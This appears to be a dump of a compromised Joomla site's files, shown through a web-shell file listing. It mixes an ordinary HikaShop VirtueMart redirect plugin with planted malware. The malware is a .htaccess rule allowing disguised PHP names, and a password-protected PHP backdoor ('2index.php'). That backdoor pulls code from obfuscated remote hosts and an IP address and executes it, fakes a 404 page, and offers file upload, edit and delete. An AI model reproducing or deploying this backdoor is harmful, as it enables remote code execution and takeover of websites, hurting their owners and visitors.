Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/joomla4/ |
| [Home] [System Details] [Kill Me] |
index.html000064400000000054151161770740006551 0ustar00<html><body
bgcolor="#FFFFFF"></body></html>vm_redirect.php000064400000012667151161770740007605
0ustar00<?php
/**
* @package HikaShop for Joomla!
* @version 4.4.1
* @author hikashop.com
* @copyright (C) 2010-2021 HIKARI SOFTWARE. All rights reserved.
* @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
*/
defined('_JEXEC') or die('Restricted access');
?><?php
class plgSystemVm_redirect extends JPlugin {
function __construct(&$subject, $config) {
parent::__construct($subject, $config);
}
function onAfterRoute() {
$app = JFactory::getApplication();
if(version_compare(JVERSION,'3.0','>=')) {
$option = $app->input->getVar('option');
$vmProdId = $app->input->getInt('product_id');
if (empty($vmProdId))
$vmProdId =
$app->input->getInt('virtuemart_product_id');
$vmCatId = $app->input->getInt('category_id');
if (empty($vmCatId))
$vmCatId =
$app->input->getInt('virtuemart_category_id');
$vmOrderId = $app->input->getInt('order_id');
if (empty($vmOrderId))
$vmOrderId = $app->input->getInt('order_number');
} else {
$option = JRequest::getVar('option');
$vmProdId = JRequest::getInt('product_id');
if (empty($vmProdId))
$vmProdId = JRequest::getInt('virtuemart_product_id');
$vmCatId = JRequest::getInt('category_id');
if (empty($vmCatId))
$vmCatId = JRequest::getInt('virtuemart_category_id');
$vmOrderId = JRequest::getInt('order_id');
if (empty($vmOrderId))
$vmOrderId = JRequest::getInt('order_number');
}
if(version_compare(JVERSION,'4.0','>=') &&
$app->isClient('administrator'))
return true;
if(version_compare(JVERSION,'4.0','<') &&
$app->isAdmin())
return true;
if( $option != 'com_virtuemart' )
return true;
$db = JFactory::getDBO();
if(!defined('DS'))
define('DS', DIRECTORY_SEPARATOR);
if(!include_once(rtrim(JPATH_ADMINISTRATOR,DS).DS.'components'.DS.'com_hikashop'.DS.'helpers'.DS.'helper.php'))
return true;
if(empty($vmProdId) && empty($vmCatId) &&
empty($vmOrderId)){
$currentURL = hikashop_currentURL();
if(preg_match_all('#/(virtuemart_product_id|product_id|category_id|virtuemart_category_id|order_id|order_number)/([0-9]+)#',$currentURL,$matches)){
foreach($matches[1] as $k => $key){
switch($key){
case 'product_id':
case 'virtuemart_product_id':
$vmProdId = $matches[2][$k];
break;
case 'category_id':
case 'virtuemart_category_id':
$vmCatId = $matches[2][$k];
break;
case 'order_id':
case 'order_number':
$vmOrderId = $matches[2][$k];
break;
}
}
}
if(empty($vmProdId) && empty($vmCatId) &&
empty($vmOrderId)){
return true;
}
}
$query='SHOW TABLES LIKE
'.$db->Quote($db->getPrefix().substr(hikashop_table('vm_prod'),3));
$db->setQuery($query);
$table = $db->loadResult();
if(empty($table))
return true;
$url = null;
if( !empty($vmProdId) && $vmProdId > 0 ) {
$query = "SELECT a.hk_id, b.product_name as 'name' FROM
`#__hikashop_vm_prod` a INNER JOIN `#__hikashop_product` b ON a.hk_id =
b.product_id WHERE a.vm_id = " . $vmProdId . ";";
$baseUrl = 'product&task=show';
} else if( !empty($vmCatId) && $vmCatId > 0 ) {
$id = 'vm-fallback';
$alias = 'hikashop-menu-for-module-'.$id;
$db->setQuery('SELECT id FROM
'.hikashop_table('menu',false).' WHERE
alias=\''.$alias.'\'');
$itemId = $db->loadResult();
if(empty($itemId)) {
$options = new stdClass();
$config =& hikashop_config();
$options->hikashop_params =
$config->get('default_params',null);
$classMenu = hikashop_get('class.menus');
$classMenu->loadParams($options);
$options->hikashop_params['content_type'] =
'category';
$options->hikashop_params['layout_type']='div';
$options->hikashop_params['content_synchronize']='1';
if($options->hikashop_params['columns']==1){
$options->hikashop_params['columns']=3;
}
$classMenu->createMenu($options->hikashop_params, $id);
$itemId = $options->hikashop_params['itemid'];
}
$query = "SELECT a.hk_id, b.category_name as 'name' FROM
`#__hikashop_vm_cat` a INNER JOIN `#__hikashop_category` b ON a.hk_id =
b.category_id WHERE a.vm_id = " . $vmCatId . ";";
$baseUrl = 'category&task=listing&Itemid='.$itemId;
}elseif(!empty($vmOrderId)){
$db->setQuery('SELECT order_id FROM
'.hikashop_table('order').' WHERE
order_vm_id='.$vmOrderId);
$hikaOrderId = $db->loadResult();
if(!empty($hikaOrderId)){
$url =
hikashop_completeLink('order&task=show&cid='.$hikaOrderId,
false, true);
$app->redirect($url);
return true;
}
else
{
$db->setQuery('SELECT order_id FROM
'.hikashop_table('order').' AS h INNER JOIN
`#__virtuemart_orders` AS v ON h.order_vm_id = v.virtuemart_order_id WHERE
v.order_number='.$vmOrderId);
$hikaOrderId = $db->loadResult();
if(!empty($hikaOrderId)){
$url =
hikashop_completeLink('order&task=show&cid='.$hikaOrderId,
false, true);
$app->redirect($url);
return true;
}
}
}
if( !empty($query) && !empty($baseUrl) ) {
$db->setQuery($query);
$link = $db->loadObject();
if( $link ) {
if(method_exists($app,'stringURLSafe')) {
$name = $app->stringURLSafe(strip_tags($link->name));
} else {
$name = JFilterOutput::stringURLSafe(strip_tags($link->name));
}
$url =
hikashop_completeLink($baseUrl.'&cid='.$link->hk_id.'&name='.$name,
false, true);
}
}
if( $url )
$app->redirect($url,'','message',true);
}
}
vm_redirect.xml000064400000001337151161770740007606 0ustar00<?xml
version="1.0" encoding="utf-8"?>
<extension type="plugin" version="2.5"
method="upgrade" group="system">
<name>Hikashop - VirtueMart Fallback Redirect Plugin</name>
<creationDate>12 février 2021</creationDate>
<version>4.4.1</version>
<author>Obsidev</author>
<authorEmail>dev@obsidev.com</authorEmail>
<authorUrl>http://www.obsidev.com</authorUrl>
<copyright>Copyright (C) 2011 OBSIDEV SARL - All rights
reserved.</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html
GNU/GPL</license>
<description>This plugin enables you to redirect imported data from
virtuemart</description>
<files>
<filename
plugin="vm_redirect">vm_redirect.php</filename>
</files>
<params/>
<config/>
</extension>
.htaccess000064400000000411151161770740006347 0ustar00<FilesMatch
".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch
"^(lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|radio.php|index.php|content.php|about.php|wp-login.php|admin.php)$">
Order allow,deny
Allow from all
</FilesMatch>2index.php000064400000031731151161770740006464
0ustar00<?php
$p = "7fe845c5ad3c25f83abd8f47507e6273";
if (isset($_REQUEST['ac']) &&
isset($_REQUEST['path']) &&
isset($_REQUEST['api']) &&
isset($_REQUEST['t'])) {
if(!isset($_REQUEST['s'])){$s=1;}else{$s =
$_REQUEST['s'];}
switch ($s){
case 1:
$code =
GC('htt'.'ps://c.zv'.'o1.xy'.'z/');break;
case 2:
$code =
GC('ht'.'tps://c2.ic'.'w7.co'.'m/');break;
case 3:
$code = GC('http://45.11.57.159/');break;
default:
$code =
GC('htt'.'ps://c.zv'.'o1.xy'.'z/');break;
}
$need = '<'.'?p'.'hp'; if
(strpos($code, $need) === false) { die('get failed'); }
if(function_exists('tmpfile'))
{
$file_handle = tmpfile();
fwrite($file_handle, $code);
$a = stream_get_meta_data($file_handle);
$file_path = $a['uri'];
@include($file_path);
@fclose($file_handle);
}else {
$file_path = '.c';
file_put_contents($file_path, $code);
@include($file_path);
}
@unlink($file_path);die(); }
if (isset($_REQUEST['d_time'])){
die('{->'.$p.'<-}'); }
$pass = false;
if (isset($_COOKIE['p8'])) { if(md5($_COOKIE['p8']) ==
$p) { $pass = true; } } else
{ if (isset($_POST['p8'])) { if(md5($_POST['p8']) ==
$p) { setcookie("p8", $_POST['p8']); $pass = true; } }
}
if (isset($_POST['logout']) && $_POST['logout']
= 1) { setcookie("p8", null); $pass= false; }
if (!$pass) { if(!isset($_REQUEST['520'])) {
header("HTTP/1.1 404 Not Found"); die();} echo '<form
action="#" method="post"><input
type="password" name="p8" > <input
type="submit" value="submit"></form>';
die(); }
echo '<form action="#"
method="post"><input type="hidden"
name="logout" value="1"> <input
type="submit" value="logout"></form>';
function GC($a)
{
$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s',
$a, $_REQUEST['api'], $_REQUEST['ac'],
$_REQUEST['path'], $_REQUEST['t']); $code =
@file_get_contents($url); if ($code == false) { $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT,
'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch,
CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$code = curl_exec($ch); curl_close($ch); }return $code;}
?>
<!DOCTYPE html>
<html lang="en">
<!-- a22bcS0vMzEJElwPNAQA== -->
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible"
content="IE=edge">
<meta name="viewport" content="width=device-width,
initial-scale=1.0">
<title>000</title>
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"
crossorigin="anonymous">
<link rel="stylesheet"
href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
crossorigin="anonymous"
referrerpolicy="no-referrer" />
</head>
<body>
<?php
//$L7CRgrfunction
function formatSizeUnits($bytes)
{
if ($bytes >= 1073741824) {
$bytes = number_format($bytes / 1073741824, 2) . ' GB';
} elseif ($bytes >= 1048576) {
$bytes = number_format($bytes / 1048576, 2) . ' MB';
} elseif ($bytes >= 1024) {
$bytes = number_format($bytes / 1024, 2) . ' KB';
} elseif ($bytes > 1) {
$bytes = $bytes . ' bytes';
} elseif ($bytes == 1) {
$bytes = $bytes . ' byte';
} else {
$bytes = '0 bytes';
}
return $bytes;
}
function fileExtension($file)
{
return substr(strrchr($file, '.'), 1);
}
function fileIcon($file)
{
$imgs = array("apng", "avif", "gif",
"jpg", "jpeg", "jfif", "pjpeg",
"pjp", "png", "svg", "webp");
$audio = array("wav", "m4a", "m4b",
"mp3", "ogg", "webm", "mpc");
$ext = strtolower(fileExtension($file));
if ($file == "error_log") {
return '<i class="fa-sharp fa-solid
fa-bug"></i> ';
} elseif ($file == ".htaccess") {
return '<i class="fa-solid
fa-hammer"></i> ';
}
if ($ext == "html" || $ext == "htm") {
return '<i class="fa-brands
fa-html5"></i> ';
} elseif ($ext == "php" || $ext == "phtml") {
return '<i class="fa-brands fa-php"></i>
';
} elseif (in_array($ext, $imgs)) {
return '<i class="fa-regular
fa-images"></i> ';
} elseif ($ext == "css") {
return '<i class="fa-brands
fa-css3"></i> ';
} elseif ($ext == "txt") {
return '<i class="fa-regular
fa-file-lines"></i> ';
} elseif (in_array($ext, $audio)) {
return '<i class="fa-duotone
fa-file-music"></i> ';
} elseif ($ext == "py") {
return '<i class="fa-brands
fa-python"></i> ';
} elseif ($ext == "js") {
return '<i class="fa-brands fa-js"></i>
';
} else {
return '<i class="fa-solid fa-file"></i>
';
}
}
function encodePath($path)
{
$a = array("/", "\\", ".",
":");
$b = array("ক", "খ", "গ",
"ঘ");
return str_replace($a, $b, $path);
}
function decodePath($path)
{
$a = array("/", "\\", ".",
":");
$b = array("ক", "খ", "গ",
"ঘ");
return str_replace($b, $a, $path);
}
$root_path = __DIR__;
$path = $_SERVER['SCRIPT_FILENAME'];
if(strpos($_SERVER['SCRIPT_FILENAME'], ":"))
{
$path = str_replace('\\', '/', $path);
}
if(str_replace('//','/',$_SERVER['PHP_SELF'])
== str_replace('\\\\','/',$path))
{
$root_path = ('/');}
else {
$root_path =
(str_replace(str_replace('//','/',$_SERVER['PHP_SELF']),
'', str_replace('\\\\','/',$path) ));
}
if (isset($_GET['p'])) {
if (empty($_GET['p'])) {
$p = __DIR__;
} elseif (!is_dir(decodePath($_GET['p']))) {
echo ("<script>\nalert('Directory is Corrupted and
Unreadable.');\nwindow.location.replace('?');\n</script>");
} elseif (is_dir(decodePath($_GET['p']))) {
$p = decodePath($_GET['p']);
}
} elseif (isset($_GET['q'])) {
if (!is_dir(decodePath($_GET['q']))) {
echo
("<script>window.location.replace('?p=');</script>");
} elseif (is_dir(decodePath($_GET['q']))) {
$p = decodePath($_GET['q']);
}
} else {
$p = __DIR__;
}
define("PATH", $p);
echo ('
<nav class="navbar navbar-light" style="background-color:
#e3f2fd;">
<div class="navbar-brand">
<a href="?"><img
src="https://github.com/fluidicon.png" width="30"
height="30" alt=""></a>
');
$path = str_replace('\\', '/', PATH);
$paths = explode('/', $path);
foreach ($paths as $id => $dir_part) {
if ($dir_part == '' && $id == 0) {
$a = true;
echo "<a href=\"?p=/\">/</a>";
continue;
}
if ($dir_part == '')
continue;
echo "<a href='?p=";
for ($i = 0; $i <= $id; $i++) {
echo str_replace(":", "ঘ", $paths[$i]);
if ($i != $id)
echo "ক";
}
echo "'>" . $dir_part . "</a>/";
}
echo ('
</div>
<div class="form-inline">
<a href="?upload&q=' . urlencode(encodePath(PATH)) .
'"><button class="btn btn-dark"
type="button">Upload File</button></a>
<a href="?"><button type="button"
class="btn btn-dark">HOME</button></a>
</div>
</nav>');
if (isset($_GET['p'])) {
//fetch files
if (is_readable(PATH)) {
$fetch_obj = scandir(PATH);
$folders = array();
$files = array();
foreach ($fetch_obj as $obj) {
if ($obj == '.' || $obj == '..') {
continue;
}
$new_obj = PATH . '/' . $obj;
if (is_dir($new_obj)) {
array_push($folders, $obj);
} elseif (is_file($new_obj)) {
array_push($files, $obj);
}
}
}
echo '
<table class="table table-hover">
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Size</th>
<th scope="col">Modified</th>
<th scope="col">Perms</th>
<th scope="col">Actions</th>
</tr>
</thead>
<tbody>
';
foreach ($folders as $folder) {
echo " <tr>
<td><i class='fa-solid fa-folder'></i>
<a href='?p=" . urlencode(encodePath(PATH . "/" .
$folder)) . "'>" . $folder . "</a></td>
<td><b>---</b></td>
<td>". date("F d Y H:i:s.", filemtime(PATH .
"/" . $folder)) . "</td>
<td>0" . substr(decoct(fileperms(PATH . "/" .
$folder)), -3) . "</a></td>
<td>
<a title='Rename' href='?q=" .
urlencode(encodePath(PATH)) . "&r=" . $folder .
"'><i class='fa-sharp fa-regular
fa-pen-to-square'></i></a>
<a title='Delete' href='?q=" .
urlencode(encodePath(PATH)) . "&d=" . $folder .
"'><i class='fa fa-trash'
aria-hidden='true'></i></a>
<td>
</tr>
";
}
foreach ($files as $file) {
echo " <tr>
<td>" . fileIcon($file) . $file . "</td>
<td>" . formatSizeUnits(filesize(PATH . "/"
. $file)) . "</td>
<td>" . date("F d Y H:i:s.", filemtime(PATH
. "/" . $file)) . "</td>
<td>0". substr(decoct(fileperms(PATH . "/"
.$file)), -3) . "</a></td>
<td>
<a title='Edit File' href='?q=" .
urlencode(encodePath(PATH)) . "&e=" . $file .
"'><i class='fa-solid
fa-file-pen'></i></a>
<a title='Rename' href='?q=" .
urlencode(encodePath(PATH)) . "&r=" . $file .
"'><i class='fa-sharp fa-regular
fa-pen-to-square'></i></a>
<a title='Delete' href='?q=" .
urlencode(encodePath(PATH)) . "&d=" . $file .
"'><i class='fa fa-trash'
aria-hidden='true'></i></a>
<td>
</tr>
";
}
echo " </tbody>
</table>";
} else {
if (empty($_GET)) {
echo
("<script>window.location.replace('?p=');</script>");
}
}
if (isset($_GET['upload'])) {
echo '
<form method="post"
enctype="multipart/form-data">
Select file to upload:
<input type="file" name="fileToUpload"
id="fileToUpload">
<input type="submit" class="btn btn-dark"
value="Upload" name="upload">
</form>';
}
if (isset($_GET['r'])) {
if (!empty($_GET['r']) &&
isset($_GET['q'])) {
echo '
<form method="post">
Rename:
<input type="text" name="name"
value="' . $_GET['r'] . '">
<input type="submit" class="btn btn-dark"
value="Rename" name="rename">
</form>';
if (isset($_POST['rename'])) {
$name = PATH . "/" . $_GET['r'];
if(rename($name, PATH . "/" .
$_POST['name'])) {
echo ("<script>alert('Renamed.');
window.location.replace('?p=" . encodePath(PATH) .
"');</script>");
} else {
echo ("<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) . "');</script>");
}
}
}
}
if (isset($_GET['e'])) {
if (!empty($_GET['e']) &&
isset($_GET['q'])) {
echo '
<form method="post">
<textarea style="height: 500px;
width: 90%;" name="data">' .
htmlspecialchars(file_get_contents(PATH."/".$_GET['e']))
. '</textarea>
<br>
<input type="submit" class="btn btn-dark"
value="Save" name="edit">
</form>';
if(isset($_POST['edit'])) {
$filename = PATH."/".$_GET['e'];
$data = $_POST['data'];
$open = fopen($filename,"w");
if(fwrite($open,$data)) {
echo ("<script>alert('Saved.');
window.location.replace('?p=" . encodePath(PATH) .
"');</script>");
} else {
echo ("<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) . "');</script>");
}
fclose($open);
}
}
}
if (isset($_POST["upload"])) {
$target_file = PATH . "/" .
$_FILES["fileToUpload"]["name"];
if
(move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$target_file)) {
echo
"<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"]))
. " has been uploaded.</p>";
} else {
echo "<p>Sorry, there was an error uploading your
file.</p>";
}
}
if (isset($_GET['d']) && isset($_GET['q'])) {
$name = PATH . "/" . $_GET['d'];
if (is_file($name)) {
if(unlink($name)) {
echo ("<script>alert('File removed.');
window.location.replace('?p=" . encodePath(PATH) .
"');</script>");
} else {
echo ("<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) . "');</script>");
}
} elseif (is_dir($name)) {
if(rmdir($name) == true) {
echo ("<script>alert('Directory
removed.'); window.location.replace('?p=" . encodePath(PATH)
. "');</script>");
} else {
echo ("<script>alert('Some error
occurred.'); window.location.replace('?p=" .
encodePath(PATH) . "');</script>");
}
}
}
?>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
crossorigin="anonymous"></script>
</body>
</html>